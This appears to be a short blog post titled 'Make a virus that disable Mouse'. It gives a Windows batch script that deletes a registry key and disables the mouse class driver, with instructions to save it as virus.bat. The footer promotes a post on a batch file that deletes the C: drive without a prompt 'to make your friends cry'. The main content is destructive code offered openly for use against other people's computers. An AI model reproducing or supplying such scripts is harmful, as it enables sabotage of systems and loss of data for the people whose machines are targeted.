Skip to main content

Make a virus that disable Mouse


Make a virus that disable Mouse


Open Notepad and copy below codes:


rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------

Save this file as virus.bat


Done you just created your virus.

For more computer knowledge CLICK HERE

Popular posts from this blog

BATCH FILE TO DELETE C: DRIVE | Delete C Drive cmd

More in the notepad tricks,here is a batch file program to delete an entire drive form the computer. Yes, you heard it right. Notepad is your biggest tool to put your evil efforts to make your friends cry. This short trick to wipe and Delete C Drive has a small code that has the power to delete your hard drive without any prompt. This chunk of code is really helpful if you want to crash and format a hard drive. LEARN HOW TO DELETE AN ENTIRE DRIVE FROM YOUR COMPUTER

Change Your IP in 15 secs

How To: Change Your Ip In Less Then 1 Minute